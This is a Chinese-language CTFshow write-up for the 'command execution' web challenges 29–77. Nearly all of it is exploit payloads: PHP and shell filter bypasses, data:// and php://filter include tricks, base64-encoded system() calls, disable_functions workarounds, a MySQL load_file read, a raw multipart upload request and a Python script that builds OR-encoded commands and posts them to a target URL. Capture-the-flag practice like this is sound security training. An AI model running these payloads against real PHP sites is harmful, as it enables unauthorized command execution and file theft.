[原创]CTFSHOW命令执行WP
2021-9-22 17:26 26411
CTFSHOW命令执行
web29
过滤了flag
payload:
随便写几个姿势
1 2 3 4 5 6 7 8 | / ?c = system( "nl fl??????" ); / ?c = system( "nl fl*" ); / ?c = system( "nl fla''g.php" ); / ?c = echo `nl fla""g.php`; / ?c = echo `nl fla\g.php`; / ?c = include($_GET[ 1 ]);& 1 = php: / / filter / read = convert.base64 - encode / resource = flag.php / ?c = eval ($_GET[ 1 ]);& 1 = system( 'nl flag.php' ); 剩下的我不会了 |
web30
过滤了flag|system|php
用 echo 配合反引号来执行命令
payload:
1 2 3 4 5 | / ?c = echo `nl fla" "g.p" "hp`; / ?c = echo `nl fla?????`; / ?c = echo `nl f * `; / ?c = eval ($_GET[ 1 ]);& 1 = system( 'nl flag.php' ); / ?c = include($_GET[ 1 ]);& 1 = php: / / filter / read = convert.base64 - encode / resource = flag.php |
web31
过滤了flag|system|php|cat|sort|shell|\.| |
没关系，我们有的是姿势
payload:
1 2 3 | / ?c = highlight_file( next (array_reverse(scandir(dirname(__FILE__))))); / ?c = include($_GET[ 1 ]);& 1 = php: / / filter / read = convert.base64 - encode / resource = flag.php / ?c = show_source( next (array_reverse(scandir(pos(localeconv()))))); |
web32
include 不需要括号，分号可以用 ?> 代替。
payload:
1 2 3 | / ?c = include$_GET[ 1 ]?>& 1 = php: / / filter / read = convert.base64 - encode / resource = flag.php / ?c = include$_GET[ 1 ]?>& 1 = data: / / text / plain,<?php system( "cat flag.php" );?> / ?c = include$_GET[ 1 ]?>& 1 = data: / / text / plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs / Pg = = |
web33-36
payload:
1 2 3 | / ?c = include$_GET[ 1 ]?>& 1 = php: / / filter / read = convert.base64 - encode / resource = flag.php / ?c = include$_GET[ 1 ]?>& 1 = data: / / text / plain,<?php system( "cat flag.php" );?> / ?c = include$_GET[ 1 ]?>& 1 = data: / / text / plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs / Pg = = |
web37
1 2 3 4 5 6 7 8 9 10 11 12 | <?php / / flag in flag.php error_reporting( 0 ); if (isset($_GET[ 'c' ])){ $c = $_GET[ 'c' ]; if (!preg_match( "/flag/i" , $c)){ include($c); echo $flag; } } else { highlight_file(__FILE__); } |
payload:
1 2 | / ?c = data: / / text / plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs / Pg = = / ?c = data: / / text / palin,<?php system( "nl fla*" );?> |
web38
过滤了flag
payload:
1 | / ?c = data: / / text / plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs / Pg = = |
web39
payload:
1 | / ?c = data: / / text / palin,<?php % 20system ( "nl%20f*" );?> |
web40-41
理论上是异或
然后我懒
贴exp:
1 2 3 4 5 6 7 8 9 10 11 12 13 | import re content = '' preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/' for i in range ( 256 ): for j in range ( 256 ): if not (re.match(preg, chr (i),re.I) or re.match(preg, chr (j),re.I)): k = i | j if k> = 32 and k< = 126 : a = '%' + hex (i)[ 2 :].zfill( 2 ) b = '%' + hex (j)[ 2 :].zfill( 2 ) content + = ( chr (k) + ' ' + a + ' ' + b + '\n' ) f = open ( 'rce_or.txt' , 'w' ) f.write(content) |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 | # -*- coding: utf-8 -*- import requests import urllib from sys import * import os os.system( "php rce_or.php" ) #没有将php写入环境变量需手动运行 if ( len (argv)! = 2 ): print ( "=" * 50 ) print ( 'USER:python exp.py <url>' ) print ( "eg: python exp.py http://ctf.show/" ) print ( "=" * 50 ) exit( 0 ) url = argv[ 1 ] def action(arg): s1 = "" s2 = "" for i in arg: f = open ( "rce_or.txt" , "r" ) while True : t = f.readline() if t = = "": break if t[ 0 ] = = i: #print(i) s1 + = t[ 2 : 5 ] s2 + = t[ 6 : 9 ] break f.close() output = "(\"" + s1 + "\"|\"" + s2 + "\")" return (output) while True : param = action( input ( "\n[+] your function:" ) ) + action( input ( "[+] your command:" )) data = { 'c' :urllib.parse.unquote(param) } r = requests.post(url,data = data) print ( "\n[*] result:\n" + r.text) |
exp取自https://wp.ctf.show/d/137-ctfshow-web-web41/4
web42
`>/dev/null 2>&1` 把所有的输出流（包括标准错误和标准输出）都重定向到空设备丢弃
可以用 %0a、%26、|| 截断
payload:
1 2 3 | / ?c = nl % 20 * % 0a = = 姿势就不写那么多了 截断后看过滤自由发挥 |
web43
过滤了;|cat
payload:
1 | / ?c = nl % 20 * % 0a |
web44
多过滤了个flag
通配符搞定
payload:
1 | / ?c = nl % 20 * % 0a |
web45
空格被过滤了
payload:
1 | / ?c = nl$IFS * % 0a |
web46-49
过滤了\;|cat|flag| |[0-9]|\\$|\*/
payload:
1 2 3 4 5 6 7 8 9 | / ?c = nl % 09fla \g.php|| / ?c = nl % 09fla \g.php % 0a / ?c = nl % 09fla ''g.php % 0a / ?c = nl % 09fla ""g.php % 0a / ?c = vi % 09fla \g.php % 0a / ?c = tac % 09fla \g.php % 0a / ?c = uniq % 09fla \g.php % 0a / ?c = nl<fla''g.php|| / ?c = nl % 09fla \g.php % 26 |
web50-51
payload:
1 | / ?c = nl<fla % 27 % 27g .php|| |
web52
payload:
1 | / ?c = nl${IFS} / fl""ag % 0a |
web53
payload:
1 2 3 4 | / ?c = nl${IFS}fla % ' 'g.p' 'hp / ?c = ca''t${IFS}fl?????? / ?c = ca' 't${IFS}fl' 'ag.p' 'hp 应该还有其他姿势 |
web54
payload:
1 2 3 | / ?c = mv${IFS}fla?.php${IFS}t.tx''t 爷给他改个名 / ?c = / bin / ?at${IFS}f??????? |
web55
= = 只能是数字
对不起骚套路开始
payload:
1 | / ?c = / ??? / ???? 64 + ????.??? |
web56
https://blog.csdn.net/qq_46091464/article/details/108513145
数据包:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | POST / ?c = . + / ??? / ????????[@ - [] HTTP / 1.1 Host: 6595d4e2 - edc5 - 4ff4 - a08b - c93d2f563732.challenge.ctf.show: 8080 Content - Length: 329 Cache - Control: max - age = 0 Upgrade - Insecure - Requests: 1 Origin: null Content - Type : multipart / form - data; boundary = - - - - WebKitFormBoundarydZeuVbMPZVcyvpNM User - Agent: Mozilla / 5.0 (Windows NT 10.0 ; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 92.0 . 4515.159 Safari / 537.36 Accept: text / html,application / xhtml + xml,application / xml;q = 0.9 ,image / avif,image / webp,image / apng, * / * ;q = 0.8 ,application / signed - exchange;v = b3;q = 0.9 Accept - Encoding: gzip, deflate Accept - Language: zh - CN,zh;q = 0.9 Connection: close - - - - - - WebKitFormBoundarydZeuVbMPZVcyvpNM Content - Disposition: form - data; name = "file" ; filename = "2.php" Content - Type : application / octet - stream #!/bin/sh cat / var / www / html / flag.php - - - - - - WebKitFormBoundarydZeuVbMPZVcyvpNM Content - Disposition: form - data; name = "submit" 111 - - - - - - WebKitFormBoundarydZeuVbMPZVcyvpNM - - |
web58
凑出 36
-37 按位取反（~）得到 36
payload:
1 | $((~$(($((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_})))))))) |
web59
绕过disable_functions
我只想到一种
file
file() 可以把文件读取到一个数组，再打印出来
payload:
1 2 3 | c = var_dump( file ( 'flag.php' )); c = highlight_file( "flag.php" ); c = show_source( 'flag.php' ); |
web60-65
payload:
1 2 | c = highlight_file( "flag.php" ); c = show_source( 'flag.php' ); |
web66
payload:
1 2 3 4 | c = var_dump(scandir( "/" )); 扫描到flag 是txt 然后日他妈的 c = highlight_file( '/flag.txt' ); |
web67-70
= = 好家伙
ban的真多
payload:
1 2 3 | c = include( '/flag.txt' ); c = require( '/flag.txt' ); c = require_once( '/flag.txt' ); |
web71
ob_get_contents — 返回输出缓冲区的内容
ob_end_clean — 清空(擦除)缓冲区并关闭输出缓冲
此函数丢弃最顶层输出缓冲区的内容并关闭这个缓冲区。如果想要进一步处理缓冲区的内容,必须在ob_end_clean()之前调用ob_get_contents(),因为当调用ob_end_clean()时缓冲区内容将被丢弃。
https://blog.csdn.net/solitudi/article/details/109837640?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522163062881716780269897928%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=163062881716780269897928&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-109837640.first_rank_v2_pc_rank_v29&utm_term=y4tacker+%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C&spm=1018.2226.3001.4187 y4的blog说的很清楚
payload:
1 | c = include( '/flag.txt' );;exit(); |
web72
看一下 y4 的 blog 就可以了，payload 不贴了，太长了。
## web73
1 2 3 4 5 6 | c = ?><?php $a = new DirectoryIterator( "glob:///*" ); foreach($a as $f) {echo($f - >__toString(). ' ' ); } exit( 0 ); ?> |
看一下目录
然后
payload:
1 | c = include( '/flagc.txt' );exit(); |
web74
同73题
web75-76
扫目录
1 | c = $a = new DirectoryIterator( "glob:///*" );foreach($a as $f){echo($f - >__toString(). ' ' );}exit( 0 ); |
mysql load_file读文件
1 2 3 4 | c = try {$dbh = new PDO( 'mysql:host=localhost;dbname=ctftraining' , 'root' , 'root' );foreach($dbh - >query( 'select load_file("/flag36.txt")' ) as $row) {echo($row[ 0 ]). "|" ; }$dbh = null;}catch (PDOException $e) {echo $e - >getMessage();exit( 0 );}exit( 0 ); |
web77
不是很清楚这个题怎么做
但是我复现了一下
https://www.laruence.com/2020/03/11/5475.html
https://blog.csdn.net/miuzzx/article/details/108619930